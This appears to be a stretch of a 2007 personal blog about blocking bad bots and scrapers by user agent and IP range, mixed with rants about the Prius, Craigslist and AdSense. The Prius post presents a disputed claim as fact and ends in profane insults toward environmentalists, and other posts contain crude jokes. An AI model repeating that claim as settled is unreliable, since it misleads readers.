If you've never seen Webaroo before, the concept of copyright obviously has been completely glossed over.
Here's what it says on their website: Webaroo servers crawl the web, analyze web pages and automatically select the subset of pages with the greatest diversity and quality in the least storage size. These pages are then packaged into topic-specific "Web Packs" that can be downloaded by users onto their devices. Once downloaded, users can search and browse that content on the go.
Here's an English to English translation:
Webaroo takes whatever copyrighted content of yours we want and repackage it for our customers without permission. Of course we do it without permission because nobody knows about Webaroo in the first place so they won't stop us or the many bot names. Isn't it cool how we're going to steal your shit and pack it up so others can download it and now they don't even need to bother visiting your website? Wicked!Look at the total number of bot names coming from their crawler's IP address.
64.124.122.228 "WebarooBot (Webaroo Bot; http://64.124.122.252/feedback.html)"Hell, if you were trying to stop them using robots.txt it's a lost cause as the bot names seem to get changed faster than a baby's diaper.
64.124.122.228 "PiyushBot (Piyush Web Miner; http://piyush.com/feedback.html)"
64.124.122.228 "RufusBot (Rufus Web Miner; http://www.webaroo.com/rooSiteOwners.html)"
64.124.122.228 "RufusBot (Rufus Web Miner; http://64.124.122.252/feedback.html)"
64.124.122.228 "SumeetBot (Sumeet Bot; http://64.124.122.252/feedback.html)"
64.124.122.228 "PsBot (PsBot; http://64.124.122.252/feedback.html)"
64.124.122.228 "pulseBot (pulse Web Miner)"
I would just block their range of IP's, it's more convenient.
Webaroo MFN-B843-64-124-122-224-27 (NET-64-124-122-224-1)That's how you stop name changing bots, the firewall way.
64.124.122.224 - 64.124.122.255
Package THAT into a topic-specific "Web Pack" and download it.
Posted by
IncrediBILL
at
4/08/2007 09:37:00 AM
15
comments
Labels: Bad Bots
Prius Damages Planet Worse Than SUVs
I'm sure a few of you have read the report that the actual environmental damage caused by a Prius is worse than a Hummer, but in case you haven't, go read this article. I'm not saying that the concept of a Prius is bad, nor is trying to save some gas bad, but when you stack up the total environmental damage caused by the Prius manufacturing process vs. the meager savings to the end user, it's damn near criminal.
Bet you Prius users feel good about saving some gas in your wallet while driving an overpriced vehicle that has already caused more harm to the environment than the average car had you driven it instead.
Now that you've read it and are more educated about the situation, if you actually own a Prius, you should take it back to your Toyota dealer and demand a refund purely on the ethics of this so-called environmentally friendly car. If they refuse to give you your money back, I'm wondering what a Judge in a court of law would say if someone sued to get a refund about being mislead about the environmental impact of the Prius.
Hey, it's just a matter of time and we all know Americans love to sue.
Besides, the environmentally hopped up fanatics won't admit they made any mistake in the first place or they'll tell you they're all too busy getting people to sign a petition to ban the chemical H2O which is getting into all the water supplies.
Fucking tree hugging naive planet killers, don't you just love 'em?
Posted by
IncrediBILL
at
4/08/2007 12:18:00 AM
7
comments
Saturday, April 07, 2007
Swooglebot Thnks My Site Is Anti-Semantic
Here comes the little toy bot from UMBC that's trying to figure out the semantic web and sure enough, my anti-semantic site booted the little fucker.
Here's the 411:
130.85.34.29 [eb2.cs.UMBC.EDU.] "Swooglebot/2.0. (+http://swoogle.umbc.edu/swooglebot.html)"Since my site is anti-semantic, does that make me an anti-semantite?
Hmmm...
Posted by
IncrediBILL
at
4/07/2007 11:34:00 AM
0
comments
Labels: Bad Bots
Nutch Goes to the Opera
OK, everyone knows I'm a big Nutch fan.
Everyone should also know the above statement is sarcasm laid on thick like peanut butter.
Anyway, back to the topic...
I saw this supposedly Nutch user agent in my logs today which is pretty slimy claiming to be MSIE, Opera, and Nutch all in the same UA.
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.01/Nutch-0.9 (http://lucene.apache.org/nutch/about.html; http://lucene.apache.org/nutch/bot.html; mail@dev.null)Whoever thought that was clever enough to slide under my radar was wrong as that word Nutch set off alarms and tossed your crawl into the online equivalent of the pit of despair.
Sorry, better luck next time.
Posted by
IncrediBILL
at
4/07/2007 10:36:00 AM
2
comments
Labels: Bad Bots
Friday, April 06, 2007
Craigslooters Even Take Kitchen Sink.
If you missed this news item it bears repeating just because it's a cautionary tale about how some people are real lowlife scumbags.
Someone posted an ad on Craigslist for a location in Tacoma telling everyone to "Please help yourself to anything on the property." and they took it, literally took everything including the front door and the kitchen sink.
Who in the hell takes anything posted on Craigslist that seriously?
Obviously common sense flew out the window when the first person on the scene encountered a locked building and had to remedy that situation before they could start helping themselves to everything else, so I assume the door was the first to go.
Wonder what could happen if someone posted something like this for a local WalMart for the "2am giveaway, everything you can carry in 1 trip you can have!". Would people be that stupid to think WalMart was endorsing looting their own stores?
After what happened with the LA riots, anything is possible.
It's just another reason to weep for the future.
Posted by
IncrediBILL
at
4/06/2007 11:32:00 AM
1 comments
Thursday, April 05, 2007
Porn spammers at it again
Don't know what porn spammers hope to gain from this, but they're adding a parameter to an actual URL on my site and cloaking this information to Google.
You may see requests like this in your log file:
http://www.domain.com/mypage.html?ref=spammerdomain.com
Don't know what they're trying to game in Google, don't even give a shit, I'm just bouncing any request with "?ref=" in the URL to stop this nonsense cold.
Posted by
IncrediBILL
at
4/05/2007 06:56:00 PM
0
comments
Labels: Damn Spam
Monday, March 26, 2007
WorldWebWide Scrapes LookDumb
Today my content tracking bugs led me to something in the worldwebwide.net which originated from LookSmart.
The IP address where the data was originally crawled from:60.88.242.64 -> sv-crawlfw4.looksmart.com
This is nothing new as LookSmart seems to be a scraping target as I've already reported same thing happening with GoodBidWords.com containing scraped LookSmart listings.
Posted by
IncrediBILL
at
3/26/2007 10:40:00 AM
8
comments
Livebot vs. Googlebot - Microsoft trying to catch up?
Was looking over my log stats today for my site (not this blog) it was surprising to see Microsoft's Livebot crawling very aggressively, possibly taking more pages and returning faster then Googlebot this month. I'll give Livebot this much, the volume of crawling is pretty impressive compared to what it used to be so it looks like Microsoft is in this horse race to win and not just play 3rd fiddle.
Then of course we have our pals over at Ask slowly poking around my site. If Yahoo's Slurp is taking a nap this month, Ask must be in a coma or something. Slow as a snail and information seems to take forever to show up on their site. Maybe they cater to the dial-up crowd.
Then good old Gigabot seems to be crawling from a new bank of IPs and I don't even care.
Anyway, it will be interesting to see how quickly some of my new site changes show up in Live because crawling that fast and not updating as quickly would be silly!
Posted by
IncrediBILL
at
3/26/2007 09:40:00 AM
5
comments
Sunday, March 25, 2007
Site Upgrade Finally Started
Finally got around to upgrading to the new Blogger layout today and even managed to organize some of the posts with labels just to see how that works. The archive section is much easier to navigate and I think people will find this a whole bunch easier to use once I'm finished with upgrading.
Now to find a nice stretch template I like that fills my full 1680 x 1050 display and doesn't look like shit on the laptop's 1024 display!
Posted by
IncrediBILL
at
3/25/2007 04:31:00 PM
1 comments
Wednesday, March 21, 2007
Where have all the blog posts gone?
Sometimes I just have to take a little time out to make some freak'n money people. I'm not ignoring you, I'm still here, but there are days when I get so focused on doing actual work that the rants go unpublished. Besides, not all of us have the stamina to read such long winded minutia, let alone the time to write it.
Additionally, I'm getting prepared to go out and rub elbows with people that have venture cash tonight and see if there's any interest in my little project to take back control of the web. If I don't come back with a bunch of biz cards from tonight's little party just shoot me.
A few topics on my mind:
- It was nice to see common sense prevail when a Judge kicked KinderStart in the ass.
- Microsoft seems to be taking aim at Made for AdSense aka SPAM sites.
- Someone sued the Internet Archive for stealing her site.
Posted by
IncrediBILL
at
3/21/2007 01:05:00 PM
3
comments
Thursday, March 15, 2007
Local Searches and Associated Ads Miss The Boat
Local search solutions and the contextual ads that appear with those searches have some wrong thinking about how they geotarget ads to the customer.
For instance, I don't live in Alabama but I'm trying to help someone I know locate a service in Alabama, such as a plumber. Go to Google and search for an "alabama plumber" and you get the proper results and appropriate ads displayed.
Now let's trying clicking on one of those ads in Google that takes you to some specialized local service which claims it's taking me to "alabama.whatever.com" on their site.
Do I get listings for Alabama related sites?
Hell No!
The local site picks up on the keyword plumber but shows me a page geotargeted to MY IP, not what I was actually searching.
Let's assume for a second that Alabama wasn't enough information, so I changed the query in Google to "Birmingham, Alabama plumber" and clicked through and got the same stupid results from the local site pointing me back to my local area.
What's worse is that Google AdSense will show you local advertisements when you're clearly on a page researching another location. In all likelihood you would NOT click ads for your local area when it's painfully obvious, even to dense people, that it's not what you're interested in finding. Google can't claim they don't know you were interested, or it's too complicated to geotarget in that way, because Google was the search engine that found that page in the first place and passed the query information to the page you clicked which contains AdSense that reads the referrer!
Yet, here you are looking for Alabama things, on a page all about Alabama, with a referrer and query passed by Google about an Alabama search, and there's AdSense showing ads about Nevada, California and the SF Bay Area.
HELLO?
Anyone can plainly see that THOSE ADS AREN'T RELEVANT to the topic!
Obviously the local search services have a way to go and Google is just losing money with inappropriate ads on those sites.
They better get it together on local sites before someone smarter steps in and fills the gaps.
Posted by
IncrediBILL
at
3/15/2007 09:30:00 AM
0
comments
Labels: AdSense
Tuesday, March 13, 2007
Take Your AdSense Sites to the Next Level
Don't know how many people out there that read this blog are running sites with AdSense, but I posted a thread on WebmasterWorld that may be of interest.
Go read Unlock the limits of your AdSense earnings potential and you can see that I shared quite a few things you might find useful.
Posted by
IncrediBILL
at
3/13/2007 08:29:00 AM
1 comments
Labels: AdSense
Monday, March 12, 2007
Stop Cloning Around
Here's a random thought of the day to ponder.
Assuming you were cloned, if you have sex with your clone is it incest or merely masturbation?
Posted by
IncrediBILL
at
3/12/2007 09:13:00 AM
4
comments
